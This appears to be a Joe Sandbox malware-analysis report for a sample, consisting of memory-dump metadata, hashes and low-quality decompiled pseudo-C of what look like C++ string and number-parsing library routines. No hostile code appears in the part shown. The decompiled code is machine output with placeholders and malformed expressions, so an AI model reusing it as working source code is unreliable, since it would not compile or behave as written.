Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: ec51451c8c2a24db549b85963e25d05f0748d180ee0fbb974f539398fa4c0742
Instruction ID: d8503716c2fd14b6bf1eaef018fe74fd534bf1d40e8546d64ea63b8ed2d3ba89
Opcode Fuzzy Hash: ec51451c8c2a24db549b85963e25d05f0748d180ee0fbb974f539398fa4c0742
Instruction Fuzzy Hash: B4C1D177A043068BD714DE2DE4C431ABBE6AFC4358F09892DEC9A9B745D734DD068B82

Uniqueness

Uniqueness Score: -1.00%

Function 01462FD0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 01463040
memset.MSVCRT ref: 01463064

Strings

basic_string::_M_replace_aux, xrefs: 014630E0

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: memmovememset
String ID: basic_string::_M_replace_aux
API String ID: 1288253900-2536181960
Opcode ID: 9ee2213cd9f55087b41a7fac8ac7e3338c304a5b18cfebd2897238a32dc0ccf7
Instruction ID: 62f182e0312b07ffb23bad97162fa731bfcb61ed88a97cf4938c03eb88b93e4c
Opcode Fuzzy Hash: 9ee2213cd9f55087b41a7fac8ac7e3338c304a5b18cfebd2897238a32dc0ccf7
Instruction Fuzzy Hash: EF3150B56087908FC7149F2DC48062BBBF5BF96608F18855EE5988B319D732D849CB53

Uniqueness

Uniqueness Score: -1.00%

Function 01438DA0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E01438DA0(intOrPtr* __ecx, void* __ebp, char* _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				signed char* _v28;
				char _v36;
				char _v40;
				void* _v48;
				void* _v52;
				signed char* _v64;
				char _v68;
				char _v72;
				void* _v76;
				void* __edi;
				intOrPtr* _t39;
				intOrPtr* _t45;
				intOrPtr _t47;
				char* _t49;
				char _t50;
				char _t52;
				char* _t55;
				intOrPtr _t58;
				signed char* _t59;
				char _t65;
				void* _t69;
				char** _t70;
				void* _t72;
				char** _t75;

				_t38 = __ecx;
				_t70 = _t69 - 0x1c;
				_t45 =  *__ecx;
				_t47 = _a8;
				_t58 = _a12;
				_t49 = _a4;
				_t65 = _a16;
				if(_t47 + 0x3ffffffc -  *((intOrPtr*)(_t45 - 0xc)) < _t58) {
					 *_t70 = "basic_string::_M_replace_aux";
					E014797B0(_t47, _t49);
					_t39 = _t45;
					_t50 = _v40;
					_t59 = _v28;
					_v64 = _t59;
					_v68 = _v36;
					_v72 = _t50;
					E0143AAF0(_t45, _t38, _t58, _t49);
					_t72 = _t70 - 4;
					if(_t59 == 0) {
						L9:
						return _t39;
					} else {
						_t52 = _t50 +  *_t39;
						if(_t59 == 1) {
							 *_t52 =  *_v28 & 0x000000ff;
							return _t39;
						} else {
							 *((intOrPtr*)(_t72 + 8)) = _t59;
							_v68 = _t52;
							_v64 = _v28;
							memcpy(??, ??, ??);
							goto L9;
						}
					}
				} else {
					_v36 = _t58;
					_v40 = _t47;
					 *_t70 = _t49;
					E0143AAF0(__ecx);
					_t75 = _t70 - 0xc;
					if(_t58 == 0) {
						L4:
						return _t38;
					} else {
						_t55 =  &(_t49[ *__ecx]);
						if(_t58 == 1) {
							 *_t55 = _t65;
							return __ecx;
						} else {
							_v36 = _t58;
							 *_t75 = _t55;
							_v40 = _t65;
							memset(??, ??, ??);
							goto L4;
						}
					}
				}
			}

0x01438da4
0x01438da6
0x01438da9
0x01438dab
0x01438daf
0x01438db3
0x01438db7
0x01438dc6
0x01438e20
0x01438e27
0x01438e33
0x01438e38
0x01438e3c
0x01438e44
0x01438e48
0x01438e4c
0x01438e4f
0x01438e54
0x01438e59
0x01438e76
0x01438e7e
0x01438e5b
0x01438e5b
0x01438e60
0x01438e8f
0x01438e99
0x01438e62
0x01438e66
0x01438e6a
0x01438e6d
0x01438e71
0x00000000
0x01438e71
0x01438e60
0x01438dc8
0x01438dc8
0x01438dce
0x01438dd2
0x01438dd5
0x01438dda
0x01438ddf
0x01438dfd
0x01438e06
0x01438de1
0x01438de1
0x01438de6
0x01438e12
0x01438e1d
0x01438de8
0x01438dea
0x01438df1
0x01438df4
0x01438df8
0x00000000
0x01438df8
0x01438de6
0x01438ddf

APIs

memset.MSVCRT ref: 01438DF8
memcpy.MSVCRT ref: 01438E71

Part of subcall function 0143AAF0: memcpy.MSVCRT ref: 0143AB80

Strings

basic_string::_M_replace_aux, xrefs: 01438E20

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: memcpy$memset
String ID: basic_string::_M_replace_aux
API String ID: 438689982-2536181960
Opcode ID: 00174afe5e8f856e32ad3baddc54fa36967567777a4cd14b9ac15b0861d64142
Instruction ID: f40a5a5877c536ae7cd3a62a8a1c6e7c3b20f047c0b3f1beda7aec2f5f2949b5
Opcode Fuzzy Hash: 00174afe5e8f856e32ad3baddc54fa36967567777a4cd14b9ac15b0861d64142
Instruction Fuzzy Hash: DD214C72A093119FC300AF1D988441FFBE4EBD9624F554A6FF988D7325D23198549B92

Uniqueness

Uniqueness Score: -1.00%

Function 01400CA0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 28%

			E01400CA0(void* __ecx, void* __edx, void* __eflags, signed int _a4, signed char _a8, signed int _a12, intOrPtr _a16, signed int _a20, signed int _a24, intOrPtr* _a28) {
				void* _v16;
				char _v44;
				signed int _v48;
				signed int _v52;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed char _v77;
				char _v78;
				char _v80;
				signed int _v96;
				signed int _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v125;
				char _v126;
				signed int _v127;
				intOrPtr _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _t554;
				signed char _t560;
				signed int _t561;
				intOrPtr* _t562;
				signed int _t570;
				signed int _t571;
				signed int _t576;
				signed int _t578;
				signed int _t579;
				signed int _t581;
				signed int _t678;
				void* _t717;
				signed int _t737;
				signed int _t750;
				void* _t762;
				void* _t763;
				intOrPtr* _t764;
				signed int* _t766;

				_t717 = __edx;
				_t764 = _t763 - 0x9c;
				_t678 = _a4;
				_v104 = _a16;
				_v96 = _a8;
				_v100 = _a12;
				_t554 = _a20 + 0x6c;
				_v108 = _t554;
				_v172 = _t554;
				_v140 = E01474F00(__eflags);
				_t750 = E013F0230(0x14a47ec);
				_t560 =  *((intOrPtr*)( *((intOrPtr*)(_a20 + 0x6c)) + 0xc)) + _t750 * 4;
				_v116 = _t560;
				_t561 =  *_t560;
				_v112 = _t561;
				if(_t561 == 0) {
					_t562 = E01477960(0x44);
					 *(_t562 + 4) = 0;
					_t737 = _t562;
					 *_t562 = 0x14b1da4;
					 *(_t562 + 8) = 0;
					 *(_t562 + 0xc) = 0;
					 *((char*)(_t562 + 0x10)) = 0;
					 *(_t737 + 0x14) = 0;
					 *((short*)(_t737 + 0x11)) =  *0x14a8a04 & 0x0000ffff;
					 *(_t737 + 0x18) = 0;
					 *(_t737 + 0x1c) = 0;
					 *(_t737 + 0x20) = 0;
					 *(_t737 + 0x24) = 0;
					 *(_t737 + 0x28) = 0;
					 *(_t737 + 0x2c) = 0;
					 *(_t737 + 0x30) = 0;
					 *(_t737 + 0x34) = 0;
					 *((char*)(_t737 + 0x43)) = 0;
					_v172 = _v108;
					E0145C1E0(_t737, __eflags);
					_v172 = _t750;
					_v176 = _t737;
					E0145F340( *((intOrPtr*)(_a20 + 0x6c)));
					_t764 = _t764 - 0xfffffffffffffffc;
					_v112 =  *_v116;
				}
				_t570 = _v112;
				_v132 = _t570 + 0x38;
				if( *(_t570 + 0x20) != 0) {
					_t571 = _v112;
					__eflags =  *(_t571 + 0x28);
					_v127 =  *(_t571 + 0x28) != 0;
				} else {
					_v127 = 0;
				}
				_v72 = 0;
				_v76 =  &_v68;
				_v68 = 0;
				if( *((char*)(_v112 + 0x10)) != 0) {
					 *_t764 = 0x20;
					E01464B20( &_v76, _t717);
					_t764 = _t764 - 4;
				}
				_v48 = 0;
				_v52 =  &_v44;
				_v44 = 0;
				 *_t764 = 0x20;
				E01464B20( &_v52, _t717);
				_t576 = _v112;
				_v125 = 0;
				_t766 = _t764 - 4;
				_v108 = 0;
				_v116 = 0;
				_v124 = _t576 + 0x39;
				_v80 =  *((intOrPtr*)(_t576 + 0x34));
				_v148 = 0;
				_v136 = 0;
				_v126 = 0;
				goto L6;
				do {
					while(1) {
						L6:
						_t578 = _v108;
						if( *(_t762 + _t578 - 0x4c) > 4) {
							break;
						}
						switch( *((intOrPtr*)(( *(_t762 + _t578 - 0x4c) & 0x000000ff) * 4 +  &M014A87F0))) {
							case 0:
								_v120 = 1;
								goto L34;
							case 1:
								__eflags = _v96 - 0xffffffff;
								__eax = __eax & 0xffffff00 | _v96 == 0xffffffff;
								__eflags = __ebx;
								__edi = __eax;
								__eax = __eax & 0xffffff00 | __ebx != 0x00000000;
								__ecx = __edi;
								__al = __al & __cl;
								__eflags = __al;
								__esi = __eax;
								if(__al != 0) {
									__eax =  *(__ebx + 0xc);
									__eflags =  *(__ebx + 8) - __eax;
									if( *(__ebx + 8) >= __eax) {
										__eax =  *__ebx;
										__ecx = __ebx;
										__eax =  *((intOrPtr*)( *__ebx + 0x24))();
										__eflags =  *__ebx - 0xffffffff;
										__eax = 0;
										__esi =  !=  ? 0 : __esi;
										__eax = 0;
										__ebx =  ==  ? 0 : __ebx;
									} else {
										__esi = 0;
									}
								} else {
									__esi = __edi;
								}
								__edx = _v100;
								__eflags = _v104 - 0xffffffff;
								__eax = __eax & 0xffffff00 | _v104 == 0xffffffff;
								__eflags = __edx;
								__edx = __edx & 0xffffff00 | __edx != 0x00000000;
								__dl = __dl & __al;
								__eflags = __dl;
								_v120 = __dl;
								if(__dl != 0) {
									__edx = _v100;
									__eax = 0;
									__ecx =  *(__edx + 0xc);
									__eflags =  *((intOrPtr*)(__edx + 8)) -  *(__edx + 0xc);
									if( *((intOrPtr*)(__edx + 8)) >=  *(__edx + 0xc)) {
										__eax =  *__edx;
										__ecx = __edx;
										__eax =  *((intOrPtr*)( *__edx + 0x24))();
										__edx = _v120 & 0x000000ff;
										__eflags = __eax - 0xffffffff;
										__eax = 0;
										__eax =  ==  ? _v120 & 0x000000ff : 0;
										__edx = 0;
										__edx =  !=  ? _v100 : 0;
										_v100 = 0;
									}
								}
								__ecx = __esi;
								_v120 = 0;
								__eflags = __cl - __al;
								if(__cl == __al) {
									L34:
									__eflags = _v108 - 3;
									if(_v108 != 3) {
										while(1) {
											__eflags = _v96 - 0xffffffff;
											__eax = __eax & 0xffffff00 | _v96 == 0xffffffff;
											__eflags = __ebx;
											__edi = __eax;
											__eax = __eax & 0xffffff00 | __ebx != 0x00000000;
											__ecx = __edi;
											__al = __al & __cl;
											__eflags = __al;
											__esi = __eax;
											if(__al == 0) {
												__esi = __edi;
											} else {
												__eax =  *(__ebx + 0xc);
												__eflags =  *(__ebx + 8) - __eax;
												if( *(__ebx + 8) >= __eax) {
													__eax =  *__ebx;
													__ecx = __ebx;
													__eax =  *((intOrPtr*)( *__ebx + 0x24))();
													__eflags =  *__ebx - 0xffffffff;
													__eax = 0;
													__esi =  !=  ? 0 : __esi;
													__eax = 0;
													__ebx =  ==  ? 0 : __ebx;
												} else {
													__esi = 0;
												}
											}
											L53:
											__ecx = _v100;
											__eflags = _v104 - 0xffffffff;
											__eax = __eax & 0xffffff00 | _v104 == 0xffffffff;
											__eflags = _v100;
											__edx = __edx & 0xffffff00 | _v100 != 0x00000000;
											__dl = __dl & __al;
											__eflags = __dl;
											_v144 = __dl;
											if(__dl != 0) {
												__edx = _v100;
												__eax = 0;
												__ecx =  *(__edx + 0xc);
												__eflags =  *((intOrPtr*)(__edx + 8)) -  *(__edx + 0xc);
												if( *((intOrPtr*)(__edx + 8)) >=  *(__edx + 0xc)) {
													__eax =  *__edx;
													__ecx = __edx;
													__eax =  *((intOrPtr*)( *__edx + 0x24))();
													__edx = _v144 & 0x000000ff;
													__eflags = __eax - 0xffffffff;
													__eax = 0;
													__eax =  ==  ? _v144 & 0x000000ff : 0;
													__edx = 0;
													__edx =  !=  ? _v100 : 0;
													_v100 = 0;
												}
											}
											__ecx = __esi;
											__eflags = __al - __cl;
											if(__al == __cl) {
												goto L68;
											} else {
												__eflags = __ebx;
												if(__ebx == 0) {
													L57:
													__eax = _v96;
													L58:
													__esi = _v140;
													__eax = __al & 0x000000ff;
													__edx =  *(__esi + 0x18);
													__eflags =  *(__edx + __eax * 2) & 0x00000020;
													if(( *(__edx + __eax * 2) & 0x00000020) == 0) {
														goto L68;
													}
													__eax =  *(__ebx + 8);
													__eflags = __eax -  *(__ebx + 0xc);
													if(__eax >=  *(__ebx + 0xc)) {
														__eax =  *__ebx;
														__ecx = __ebx;
														__eax =  *((intOrPtr*)( *__ebx + 0x28))();
														L61:
														_v96 = 0xffffffff;
														__eflags = _v96 - 0xffffffff;
														__eax = __eax & 0xffffff00 | _v96 == 0xffffffff;
														__eflags = __ebx;
														__edi = __eax;
														__eax = __eax & 0xffffff00 | __ebx != 0x00000000;
														__ecx = __edi;
														__al = __al & __cl;
														__eflags = __al;
														__esi = __eax;
														if(__al == 0) {
															__esi = __edi;
														} else {
															__eax =  *(__ebx + 0xc);
															__eflags =  *(__ebx + 8) - __eax;
															if( *(__ebx + 8) >= __eax) {
																__eax =  *__ebx;
																__ecx = __ebx;
																__eax =  *((intOrPtr*)( *__ebx + 0x24))();
																__eflags =  *__ebx - 0xffffffff;
																__eax = 0;
																__esi =  !=  ? 0 : __esi;
																__eax = 0;
																__ebx =  ==  ? 0 : __ebx;
															} else {
																__esi = 0;
															}
														}
														goto L53;
													}
													L60:
													__eax = __eax + 1;
													__eflags = __eax;
													 *(__ebx + 8) = __eax;
													goto L61;
												}
												__eax = __edi;
												__eflags = __al;
												if(__al != 0) {
													__eax =  *(__ebx + 8);
													__eflags = __eax -  *(__ebx + 0xc);
													if(__eax >=  *(__ebx + 0xc)) {
														__eax =  *__ebx;
														__ecx = __ebx;
														__eax =  *((intOrPtr*)( *__ebx + 0x24))();
														__edx = 0;
														__eflags =  *__ebx - 0xffffffff;
														__ebx =  ==  ? 0 : __ebx;
														goto L58;
													}
													__edi = _v140;
													__ecx =  *__eax & 0x000000ff;
													__edx =  *(__edi + 0x18);
													__eflags =  *(__edx + __ecx * 2) & 0x00000020;
													if(( *(__edx + __ecx * 2) & 0x00000020) != 0) {
														goto L60;
													}
													_v96 = 0xffffffff;
													goto L68;
												}
												goto L57;
											}
										}
									} else {
										__eflags = _v136 - 1;
										__eax = __eax & 0xffffff00 | _v136 - 0x00000001 > 0x00000000;
										__eflags = __al;
										L36:
										__eflags = _t581;
										if(_t581 == 0) {
											__eflags = _v120;
											if(_v120 == 0) {
												goto L99;
											}
											__eflags = _v48 - 1;
											if(_v48 <= 1) {
												L173:
												__eflags = _v126;
												if(_v126 != 0) {
													__eflags =  *_v52 - 0x30;
													if( *_v52 != 0x30) {
														_v168 = 0x2d;
														_v172 = 1;
														_v176 = 0;
														 *_t766 = 0;
														E01462FD0(_t678,  &_v52, _t739, _t751, _t762);
														_t766 = _t766 - 0x10;
													}
												}
												_t744 = _v72;
												__eflags = _t744;
												if(_t744 != 0) {
													__eflags = _v125;
													_t601 =  ==  ? _v116 & 0x000000ff : _v148 & 0x000000ff;
													_t385 = _t744 + 1; // 0x1
													_t755 = _t385;
													_v108 =  ==  ? _v116 & 0x000000ff : _v148 & 0x000000ff;
													_t602 = _v76;
													__eflags = _t602 -  &_v68;
													if(_t602 ==  &_v68) {
														_t719 = 0xf;
													} else {
														_t719 = _v68;
													}
													__eflags = _t719 - _t755;
													if(_t719 < _t755) {
														_v168 = 1;
														_v172 = 0;
														_v176 = 0;
														 *_t766 = _t744;
														E01464F90( &_v76);
														_t602 = _v76;
														_t766 = _t766 - 0x10;
													}
													 *((char*)(_t602 + _t744)) = _v108 & 0x000000ff;
													_v72 = _t755;
													 *((char*)(_v76 + _t744 + 1)) = 0;
													_v172 =  &_v76;
													_t746 = _v112;
													_v176 =  *((intOrPtr*)(_t746 + 0xc));
													 *_t766 =  *(_t746 + 8);
													_t608 = E01473040();
													__eflags = _t608;
													if(_t608 == 0) {
														_t609 = _a24;
														 *_t609 =  *_t609 | 0x00000004;
														__eflags =  *_t609;
													}
												}
												__eflags = _v96 - 0xffffffff;
												_v108 = _v96 == 0xffffffff;
												__eflags = _v125;
												if(_v125 == 0) {
													L184:
													 *_t766 =  &_v52;
													_t597 = E014631F0(_a28);
													_t766 = _t766 - 4;
													__eflags = _t678;
													_t584 = (_t597 & 0xffffff00 | _t678 != 0x00000000) & _v108;
													__eflags = _t584;
													_t752 = _t584;
													if(_t584 == 0) {
														goto L101;
													}
													goto L186;
												} else {
													_t599 = _v112;
													__eflags =  *((intOrPtr*)(_t599 + 0x2c)) - _v116;
													if( *((intOrPtr*)(_t599 + 0x2c)) != _v116) {
														goto L100;
													}
													goto L184;
												}
											}
											L198:
											_v176 = 0;
											 *_t766 = 0x30;
											_t612 = E013F3450( &_v52);
											_t766 = _t766 - 8;
											__eflags = _t612;
											if(_t612 == 0) {
												goto L173;
											}
											_t721 = _v48;
											__eflags = _t612 - 0xffffffff;
											if(_t612 == 0xffffffff) {
												_t517 = _t721 - 1; // 0x0
												_t612 = _t517;
												__eflags = _t721;
												if(_t721 == 0) {
													 *_v52 = 0;
													goto L173;
												}
												__eflags = _t612;
												if(_t612 == 0) {
													goto L173;
												}
											}
											__eflags = _t612 - _t721;
											 *_t766 = 0;
											_t614 =  >  ? _t721 : _t612;
											_v176 =  >  ? _t721 : _t612;
											E01464D20( &_v52);
											_t766 = _t766 - 8;
											goto L173;
										}
										__eflags = _v126;
										_t616 = _v112;
										if(_v126 != 0) {
											_t617 =  *(_t616 + 0x24);
											_v120 = _t617;
										} else {
											_t617 =  *(_t616 + 0x1c);
											_v120 = _t617;
										}
										_t739 = 1;
										while(1) {
											__eflags = _v96 - 0xffffffff;
											_v108 = _v96 == 0xffffffff;
											__eflags = _t678;
											_t619 = (_t617 & 0xffffff00 | _t678 != 0x00000000) & _v108 & 0x000000ff;
											__eflags = _t619;
											_t756 = _t619;
											if(_t619 != 0) {
												_t620 =  *(_t678 + 0xc);
												__eflags =  *(_t678 + 8) - _t620;
												if( *(_t678 + 8) >= _t620) {
													__eflags =  *((intOrPtr*)( *_t678 + 0x24))() - 0xffffffff;
													_t751 =  !=  ? 0 : _t756;
													_t620 = 0;
													_t678 =  ==  ? 0 : _t678;
												} else {
													_t751 = 0;
												}
											} else {
												_t751 = _v108 & 0x000000ff;
											}
											_t722 = _v100;
											__eflags = _v104 - 0xffffffff;
											_t624 = _t620 & 0xffffff00 | _v104 == 0xffffffff;
											__eflags = _t722;
											if(_t722 == 0) {
												goto L44;
											}
											__eflags = _t624;
											if(_t624 != 0) {
												_t634 = _v100;
												_t722 =  *(_t634 + 0xc);
												__eflags =  *((intOrPtr*)(_t634 + 8)) - _t722;
												if( *((intOrPtr*)(_t634 + 8)) >= _t722) {
													_t636 =  *((intOrPtr*)( *_t634 + 0x24))();
													__eflags = _t636 - 0xffffffff;
													_t722 = _t634 & 0xffffff00 | _t636 == 0xffffffff;
													_t751 = _t751 ^ _t722;
													__eflags = _t636 - 0xffffffff;
													_t638 =  !=  ? _v100 : 0;
													_v100 =  !=  ? _v100 : 0;
												}
												L45:
												__eflags = _t739 - _v136;
												if(_t739 >= _v136) {
													L171:
													__eflags = _t739 - _v136;
													if(_t739 != _v136) {
														goto L100;
													}
													__eflags = _v48 - 1;
													if(_v48 > 1) {
														goto L198;
													}
													goto L173;
												}
												__eflags = _t751;
												if(_t751 == 0) {
													goto L171;
												}
												__eflags = _t678;
												_t696 = _v96;
												_t724 = (_t722 & 0xffffff00 | _t678 != 0x00000000) & _v108;
												__eflags = _t724;
												if(_t724 != 0) {
													_t628 =  *(_t678 + 8);
													__eflags = _t628 -  *(_t678 + 0xc);
													if(_t628 >=  *(_t678 + 0xc)) {
														_t696 =  *((intOrPtr*)( *_t678 + 0x24))();
														__eflags = _t696 - 0xffffffff;
														_t678 =  ==  ? 0 : _t678;
														goto L48;
													}
													_t757 = _v120;
													__eflags =  *_t628 - ( *(_t757 + _t739) & 0x000000ff);
													if( *_t628 == ( *(_t757 + _t739) & 0x000000ff)) {
														L50:
														_t617 = _t628 + 1;
														__eflags = _t617;
														 *(_t678 + 8) = _t617;
														L51:
														_v96 = 0xffffffff;
														_t739 = _t739 + 1;
														continue;
													}
													_v108 = _t724;
													goto L100;
												}
												L48:
												_t632 = _v120;
												__eflags =  *((intOrPtr*)(_t632 + _t739)) - _t696;
												if( *((intOrPtr*)(_t632 + _t739)) != _t696) {
													goto L100;
												}
												_t628 =  *(_t678 + 8);
												__eflags = _t628 -  *(_t678 + 0xc);
												if(_t628 >=  *(_t678 + 0xc)) {
													_t617 =  *((intOrPtr*)( *_t678 + 0x28))();
													goto L51;
												}
												goto L50;
											}
											L44:
											_t751 = _t751 ^ _t624;
											__eflags = _t751;
											goto L45;
										}
									}
								} else {
									__eflags = __ebx;
									if(__ebx == 0) {
										L77:
										__eax = _v96;
										L78:
										__edi = _v140;
										__eax = __al & 0x000000ff;
										_v120 = 0;
										__edx =  *(__edi + 0x18);
										__eflags =  *(__edx + __eax * 2) & 0x00000020;
										if(( *(__edx + __eax * 2) & 0x00000020) == 0) {
											goto L34;
										}
										__eax =  *(__ebx + 8);
										__eflags = __eax -  *(__ebx + 0xc);
										if(__eax >=  *(__ebx + 0xc)) {
											__eax =  *__ebx;
											__ecx = __ebx;
											__eax =  *((intOrPtr*)( *__ebx + 0x28))();
											L81:
											_v96 = 0xffffffff;
											_v120 = 1;
											goto L34;
										}
										L80:
										__eax = __eax + 1;
										__eflags = __eax;
										 *(__ebx + 8) = __eax;
										goto L81;
									}
									__eax = __edi;
									__eflags = __al;
									if(__al != 0) {
										__eax =  *(__ebx + 8);
										__eflags = __eax -  *(__ebx + 0xc);
										if(__eax >=  *(__ebx + 0xc)) {
											__eax =  *__ebx;
											__ecx = __ebx;
											__eax =  *((intOrPtr*)( *__ebx + 0x24))();
											__edx = 0;
											__eflags =  *__ebx - 0xffffffff;
											__ebx =  ==  ? 0 : __ebx;
											goto L78;
										}
										__esi = _v140;
										__ecx =  *__eax & 0x000000ff;
										__edx =  *(__esi + 0x18);
										__eflags =  *(__edx + __ecx * 2) & 0x00000020;
										if(( *(__edx + __ecx * 2) & 0x00000020) != 0) {
											goto L80;
										}
										_v96 = 0xffffffff;
										goto L34;
									}
									goto L77;
								}
							case 2:
								__eax = _a20;
								__eflags =  *(__eax + 0xd) & 0x00000002;
								if(( *(__eax + 0xd) & 0x00000002) != 0) {
									L140:
									__eax = _v112;
									__edi = 0;
									__eflags = 0;
									__eax =  *(_v112 + 0x18);
									_v144 = __eax;
									while(1) {
										__eflags = _v96 - 0xffffffff;
										_v120 = _v96 == 0xffffffff;
										__eflags = __ebx;
										__ecx = _v120 & 0x000000ff;
										__eax = __eax & 0xffffff00 | __ebx != 0x00000000;
										__al = __al & __cl;
										__eflags = __al;
										__esi = __eax;
										if(__al != 0) {
											__eax =  *(__ebx + 0xc);
											__eflags =  *(__ebx + 8) - __eax;
											if( *(__ebx + 8) >= __eax) {
												__eax =  *__ebx;
												__ecx = __ebx;
												__eax =  *((intOrPtr*)( *__ebx + 0x24))();
												__eflags =  *__ebx - 0xffffffff;
												__eax = 0;
												__esi =  !=  ? 0 : __esi;
												__eax = 0;
												__ebx =  ==  ? 0 : __ebx;
											} else {
												__esi = 0;
											}
										} else {
											__esi = _v120 & 0x000000ff;
										}
										__edx = _v100;
										__eflags = _v104 - 0xffffffff;
										__eax = __eax & 0xffffff00 | _v104 == 0xffffffff;
										__eflags = __edx;
										if(__edx == 0) {
											goto L145;
										}
										L144:
										__eflags = __al;
										if(__al != 0) {
											__eax = _v100;
											__edx =  *(__eax + 0xc);
											__eflags =  *((intOrPtr*)(__eax + 8)) - __edx;
											if( *((intOrPtr*)(__eax + 8)) >= __edx) {
												__edx = __eax;
												__eax =  *__eax;
												__ecx = __edx;
												__eax =  *((intOrPtr*)(__eax + 0x24))();
												__eflags = __eax - 0xffffffff;
												__edx = __edx & 0xffffff00 | __eax == 0xffffffff;
												__esi = __esi ^ __edx;
												__eflags = __eax - 0xffffffff;
												0 =  !=  ? _v100 : 0;
												_v100 =  !=  ? _v100 : 0;
											}
											L146:
											__eax = _v144;
											__eflags = __edi - _v144;
											if(__edi >= _v144) {
												L189:
												__eax = _v144;
												__eflags = __edi - __eax;
												if(__edi != __eax) {
													L167:
													__eflags = __edi;
													if(__edi != 0) {
														goto L99;
													}
													__eax = _a20;
													__eax =  *(_a20 + 0xc);
													_v120 = __eax;
													__eax = __eax >> 9;
													__eax = __eax ^ 0x00000001;
													__eax = __eax & 0x00000001;
													_v120 = __al;
													goto L68;
												}
												goto L190;
											}
											__eax = __esi;
											__eflags = __al;
											if(__al == 0) {
												goto L189;
											}
											__eflags = __ebx;
											if(__ebx == 0) {
												L150:
												__eax = _v96;
												L151:
												__esi = _v112;
												__edx =  *(__esi + 0x14);
												__eflags =  *(__edx + __edi) - __al;
												if( *(__edx + __edi) != __al) {
													goto L167;
												}
												__eax =  *(__ebx + 8);
												__eflags = __eax -  *(__ebx + 0xc);
												if(__eax >=  *(__ebx + 0xc)) {
													__eax =  *__ebx;
													__ecx = __ebx;
													__eax =  *((intOrPtr*)( *__ebx + 0x28))();
													L154:
													_v96 = 0xffffffff;
													__edi = __edi + 1;
													__eflags = _v96 - 0xffffffff;
													_v120 = _v96 == 0xffffffff;
													__eflags = __ebx;
													__ecx = _v120 & 0x000000ff;
													__eax = __eax & 0xffffff00 | __ebx != 0x00000000;
													__al = __al & __cl;
													__eflags = __al;
													__esi = __eax;
													if(__al != 0) {
														__eax =  *(__ebx + 0xc);
														__eflags =  *(__ebx + 8) - __eax;
														if( *(__ebx + 8) >= __eax) {
															__eax =  *__ebx;
															__ecx = __ebx;
															__eax =  *((intOrPtr*)( *__ebx + 0x24))();
															__eflags =  *__ebx - 0xffffffff;
															__eax = 0;
															__esi =  !=  ? 0 : __esi;
															__eax = 0;
															__ebx =  ==  ? 0 : __ebx;
														} else {
															__esi = 0;
														}
													} else {
														__esi = _v120 & 0x000000ff;
													}
													__edx = _v100;
													__eflags = _v104 - 0xffffffff;
													__eax = __eax & 0xffffff00 | _v104 == 0xffffffff;
													__eflags = __edx;
													if(__edx == 0) {
														goto L145;
													}
												}
												L153:
												__eax = __eax + 1;
												__eflags = __eax;
												 *(__ebx + 8) = __eax;
												goto L154;
											}
											__eflags = _v120;
											if(_v120 != 0) {
												__eax =  *(__ebx + 8);
												__eflags = __eax -  *(__ebx + 0xc);
